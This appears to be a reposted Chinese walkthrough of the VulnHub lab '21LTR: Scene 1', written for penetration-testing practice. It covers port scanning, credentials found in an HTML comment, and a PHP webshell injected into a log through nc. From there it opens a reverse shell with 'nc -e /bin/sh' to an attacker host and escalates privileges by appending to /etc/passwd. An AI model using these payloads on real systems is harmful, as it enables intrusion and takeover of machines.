Hack the 21LTR: Scene 1 VM (Boot to Root)
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ ? 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A? 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CST http://192.168.2.120/index.php <!-- username:logs password:zg]E-b0]+8:(58G --> ? 暂时没什么用处,我们尝试目录枚举下 ---- Scanning URL: http://192.168.2.120/ ---- http://192.168.2.120/logs/ Forbidden You don‘t have permission to access /logs/ on this server. http://192.168.2.120/logs/backup_log.php ? 这里的基本思路就是怎么把报错的访问请求写进这个文件去,然后通过PHP的代码进行执行。 这里查看了大神的通关过程,是要访问?10001 端口才能写到日志里面来 nc -nv 192.168.2.120 10001 <?php system($_GET[‘cmd‘]) ?> 下载FTP的文件查看,已经写入成功。 http://192.168.2.120/logs/backup_log.php?cmd=id 进行shell反弹 http://192.168.2.120/logs/backup_log.php?cmd=nc -e /bin/sh 192.168.2.128 1234 知道了一个秘钥文件: /media/USB_1/Stuff/Keys/id_rsa ╰─ openssl passwd -1 -salt hack pass123 sudo /usr/bin/cat >> /etc/passwd 完! (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |